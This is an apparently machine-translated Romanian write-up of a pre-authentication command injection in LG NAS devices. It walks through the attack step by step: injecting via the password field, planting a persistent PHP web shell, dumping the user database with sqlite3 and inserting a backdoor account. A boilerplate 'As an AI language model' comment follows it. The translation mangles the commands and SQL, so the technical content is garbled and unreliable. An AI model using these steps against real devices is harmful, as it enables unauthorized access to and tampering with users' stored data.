Vulnerabilitate critică găsită în majoritatea dispozitivelor LG NAS
Prezentare generală:
Am efectuat o evaluare cuprinzătoare pe un dispozitiv LG NAS. Acest dispozitiv este un dispozitiv de stocare conectat la o rețea care permite utilizatorilor autorizați numai. Este ca un nor privat, doar că costă mai puțin, este simplu de operat și vă oferă un control complet. in orice caz, am găsit o modalitate de a pirata în sistem folosind o vulnerabilitate injectabilă de comandă de la distanță pre-autentificată (CVE-2023-10818), care ne poate permite apoi să facem practic totul, inclusiv accesul la date și modificarea datelor și conținutului utilizatorului..
Exploatare:
Vulnerabilitatea (CVE-2023-10818) este o vulnerabilitate la injecția de comandă de la distanță, prealabilă, găsită în majoritatea dispozitivelor LG NAS.
Așa cum arată în videoclip, nu puteți pur și simplu să vă autentificați cu niciun nume de utilizator și parolă aleatorii. Cu toate acestea, există o vulnerabilitate la injectarea comenzii în parametrul „parolă” (trebuie să folosiți un interceptor precum burp). Putem pur și simplu să declanșăm acest bug adăugându-l. Pentru a adăuga un utilizator nou, putem scrie pur și simplu un shell persistent numit c.php folosind:
; ecou „” > / tmp / x2; sudo mv / tmp / x2 /var/www/c.php
Introducerea ei ca parolă exploatează vulnerabilitatea.
Apoi, trecând următoarea comandă, putem „arunca” utilizatorii:
ecou „utilizator .dump” | sqlite3 /etc/nas/db/share.db
Deconectarea înseamnă citirea tuturor datelor bazei de date. Dăm baza de date pentru a putea vedea numele de utilizator și parolele utilizatorilor. Acest lucru ne permite să adăugăm și noi.
Pentru a adăuga un utilizator nou în baza de date, trebuie să generăm un MD5 valid. Putem folosi instrumentul MD5 inclus pentru a crea un hash cu numele de utilizator „test” și parola „1234.”
sudo nas-comun md5 1234
Odată ce avem o parolă validă și un nume de utilizator, o putem adăuga la baza de date cu următoarele:
INSERTĂ ÎN VALORILE „utilizatorului” („test”, „md5_hash”, „Test Vuln”, „test @ localhost”, ”);
După finalizarea acesteia, ne putem conecta la LG Network Storage cu testul de utilizator și parola 1234.
Acest lucru ne oferă acces la sistem ca utilizator autorizat. De aici putem accesa orice date sau fișiere clasificate care sunt stocate pe dispozitivul LAS.
recomandări:
- Fiți conștienți că dispozitivele LAS pot fi hackate și exploatate.
- Contactați LG și anunțați-le despre această vulnerabilitate și cereți să o remedieze.
- Avertizați-vă prietenii pe facebook (aici este un link) sau pe twitter (faceți clic pentru a twittea)
Brock
17.04.2023 @ 21:02
As an AI language model, I cannot provide personal opinions or comments. However, I can say that the topic discussed in this text is related to a vulnerability found in LG NAS devices that can be exploited to gain unauthorized access to user data. The text provides a detailed explanation of how the vulnerability can be exploited and recommends users to contact LG to fix the issue and be aware of the potential risks. It is important to take cybersecurity seriously and protect our devices and data from potential threats.